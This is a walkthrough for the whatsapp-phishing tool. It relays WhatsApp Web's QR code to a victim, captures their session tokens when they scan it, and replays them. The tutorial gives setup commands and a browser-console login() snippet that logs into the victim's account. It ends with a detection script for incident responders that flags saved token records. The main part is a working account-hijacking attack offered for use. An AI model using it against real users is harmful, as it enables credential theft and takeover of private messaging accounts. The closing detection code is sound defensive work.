What does it do?

It extracts the QR code from WhatsApp Web and displays it on a new page. If someone scans the code using WhatsApp, it will grab the credentials from the web client and save them in a file. You can use these credentials to log yourself in as the person who scanned the QR code.

How does whatsapp-phishing work?

The program uses Node.js and socket.io for the website, and Selenium, a tool for scripting browsers, to communicate with the WhatsApp Web client.
The program starts an HTTP server and a socket.io server. When a new client connects to socket.io, the application asks a Selenium instance to start a new browser and connect to web.whatsapp.com. It fetches the QR code data and sends it to the client over the websocket connection. The client JavaScript then shows the QR code to the user.
If the QR code gets scanned, WhatsApp authenticates the Selenium-controlled browser and stores some tokens in localStorage and document.cookie. We extract that data and save it into a text file.

Things required for this attack

  • Kali Linux
  • Firefox browser
  • Selenium server standalone
  • Node.js
  • NPM (Node Package Manager)
If you don’t have Kali Linux, please refer to the link below for a quick tutorial on how to run Kali off a USB device.
How to install Kali Linux on a USB – http://docs.kali.org/downloading/kali-linux-live-usb-install



Steps to perform this attack


  • Boot into Kali Linux. Open a terminal. Change the directory to Desktop and clone whatsapp-phishing using the git clone command.
The commands are as follows:
cd Desktop
git clone https://github.com/mawalu/whatsapp-phishing
  • Download the Selenium standalone server jar file from here. I have used v2.53.0 in this attack.
  • Now we will install Node.js and NPM (Node Package Manager).
Open a terminal and type the following commands:
apt-get install nodejs
apt-get install npm
apt-get install nodejs-legacy
  • Now we will use NPM. Change directory to whatsapp-phishing and run npm install:
npm install
  • Start the Selenium server, then open a terminal, go to whatsapp-phishing and run node index.js.
Open a terminal, change directory to Downloads and type the following command to start the Selenium server:
java -jar selenium-server-standalone-2.53.0.jar
Make sure that the Selenium server is up and running like this. Don’t close this terminal.
Once you have the server up and running, open a new terminal, change directory to whatsapp-phishing and enter the following command:
node index.js
You should see something like this. Don’t close this terminal either.
  • It’s time to test our setup.
Open the Firefox browser and go to localhost:8080
Wait until you see something like this
  • Scan this QR code from the victim’s phone and wait for this
  • Now go to the whatsapp-phishing folder and open the secrets.txt file
  • Copy the contents of the secrets.txt file and start the Firefox browser
Go to www.web.whatsapp.com and open the console (Ctrl + Shift + I)
Firefox doesn’t allow pasting, so just type “allow pasting” (without quotes) and you can then paste the contents.
Enter the following:
var t = CONTENT_COPIED_FROM_THE_SECRETS_FILE
  • Type the following code exactly
function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
login(t)
  • Refresh the page and you will be logged in to the victim’s WhatsApp account.
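
For incident responders: the login() snippet above shows the layout of a saved record, an s object of localStorage entries and a c cookie string. The following is an added example (not part of the original page or the whatsapp-phishing project) that scans text for records of that shape and reports key names only; it assumes one JSON object per line, and the sample input is constructed.

```javascript
// Added example, not code from the whatsapp-phishing project.
// Assumption: one JSON object per line, with the two fields login() reads:
// `s` (object of localStorage entries) and `c` (';'-separated cookie string).
function looksLikeSessionRecord(obj) {
  const isObj = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);
  return isObj(obj) && isObj(obj.s) && typeof obj.c === 'string' &&
    Object.keys(obj.s).length > 0;
}

function cookieNames(cookieString) {
  return cookieString.split(';')
    .map((part) => part.trim().split('=')[0])
    .filter((name) => name.length > 0);
}

// One finding per matching line. Only key names are reported, never values,
// so the report does not itself leak session material.
function scanText(text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, index) => {
    const trimmed = line.trim();
    if (!trimmed.startsWith('{')) return;
    let parsed;
    try { parsed = JSON.parse(trimmed); } catch (e) { return; }
    if (!looksLikeSessionRecord(parsed)) return;
    findings.push({
      line: index + 1,
      localStorageKeys: Object.keys(parsed.s).sort(),
      cookieNames: cookieNames(parsed.c),
    });
  });
  return findings;
}

// Constructed sample input; key names and values are placeholders.
const SAMPLE = [
  'unrelated log line',
  '{"s":{"EXAMPLE_KEY_A":"xxxx","EXAMPLE_KEY_B":"yyyy"},"c":"example_cookie=zzzz; other=1"}',
  '{"s":"not-an-object","c":"a=b"}',
  '{"broken json',
].join('\n');

console.log(JSON.stringify(scanText(SAMPLE), null, 2));
```

A hit on a host or in a web root means session material was captured; the affected user should end all linked-device sessions from the phone so the stored tokens stop working.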